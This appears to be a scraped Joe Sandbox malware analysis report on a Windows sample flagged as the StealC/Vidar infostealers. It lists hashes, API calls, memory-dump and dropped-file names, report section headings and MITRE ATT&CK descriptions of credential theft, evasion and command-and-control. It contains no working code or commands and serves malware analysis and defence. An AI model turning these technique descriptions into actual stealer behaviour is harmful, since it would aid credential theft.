Instruction Fuzzy Hash: 1831C5B1645B90CBEB20BF38C48426977B8BF0674CF01462DD88897E11DB3A8485CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 6C2CA4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C2CA468,00000000), ref: 6C2CA4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C2CA468,00000000), ref: 6C2CA51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2CA468,?,6C2CA468,00000000), ref: 6C2CA545
memcpy.VCRUNTIME140(00000001,6C2CA468,00000001,?,?,?,6C2CA468,00000000), ref: 6C2CA57D

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: d2fd44e805016f1f9af91cdd57ed8a767279994758c302fb4dee7fdb8ee71791
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: 1E11EBB3E0021997DB0089F5DCC1EDB77999F952A9F184334ED5487781F639990582E1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zLwT7vCojz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\DBKKFCBA

C:\ProgramData\DUKNXICOZT.docx

C:\ProgramData\DWTHNHNNJB.docx

C:\ProgramData\DWTHNHNNJB.xlsx

C:\ProgramData\FIIIIDGHJEBFBGDHDGIIIIJDHJ

C:\ProgramData\GLTYDMDUST.docx

C:\ProgramData\GNLQNHOLWB.docx

C:\ProgramData\HCGCAAKJDHJJJJJKKKFBKFBAEB

Windows Analysis Report
zLwT7vCojz.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre